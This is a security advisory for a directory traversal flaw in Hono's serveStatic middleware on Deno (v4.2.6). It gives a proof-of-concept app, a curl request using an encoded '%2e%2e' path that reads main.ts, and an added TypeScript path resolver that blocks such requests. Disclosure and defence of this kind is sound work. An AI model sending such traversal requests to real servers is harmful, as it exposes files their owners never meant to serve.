GHSA-3mpf-rcc7-5347
Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Details
### Summary
When using serveStatic with Deno, it is possible to traverse out of the static directory into the directory where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
### PoC
```bash
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt
```
source
```ts
// main.ts: the vulnerable configuration from the advisory (Hono v4.2.6 on Deno).
// serveStatic is mounted at /static/* with the project root as its root.
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)
```
request
```bash
curl localhost:8000/static/%2e%2e/main.ts
```
The response is the content of main.ts.
### Impact
Unexpected files are retrieved.
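The defensive check the advisory implies, as an added example that is not Hono's own code: a resolver for a static-file handler that percent-decodes the request path once and only then inspects it, so `%2e%2e` is seen as `..` and refused instead of reaching the filesystem. The function and field names are illustrative assumptions; the inputs mirror the PoC paths above.

```typescript
// Added example, not Hono's code. The flaw in the advisory is that a ".."
// segment survives as "%2e%2e" past the traversal check. Here the path is
// decoded first and any ".." segment is refused outright.

interface ResolveResult {
  ok: boolean;
  path?: string;   // root-relative path that is safe to open (when ok)
  reason?: string; // why the request was refused (when !ok)
}

// `root` is the directory the static tree lives under (the advisory uses "./");
// `requestPath` is the raw URL path as received, still percent-encoded.
function resolveStaticPath(root: string, requestPath: string): ResolveResult {
  let decoded: string;
  try {
    // Decode exactly once: this is the form the filesystem would actually see.
    decoded = decodeURIComponent(requestPath);
  } catch {
    return { ok: false, reason: "malformed percent-encoding" };
  }
  // NUL can truncate paths in native code; backslash is a separator on Windows.
  if (/[\0\\]/.test(decoded)) {
    return { ok: false, reason: "forbidden character" };
  }
  const segments: string[] = [];
  for (const seg of decoded.split("/")) {
    if (seg === "" || seg === ".") continue; // collapse "//" and "/./"
    if (seg === "..") {
      // Refuse rather than normalise, so traversal attempts stay visible in logs.
      return { ok: false, reason: "dot-dot segment" };
    }
    segments.push(seg);
  }
  if (segments.length === 0) {
    return { ok: false, reason: "no file requested" };
  }
  const base = root.replace(/\/+$/, ""); // "./" -> "."
  return { ok: true, path: `${base}/${segments.join("/")}` };
}
```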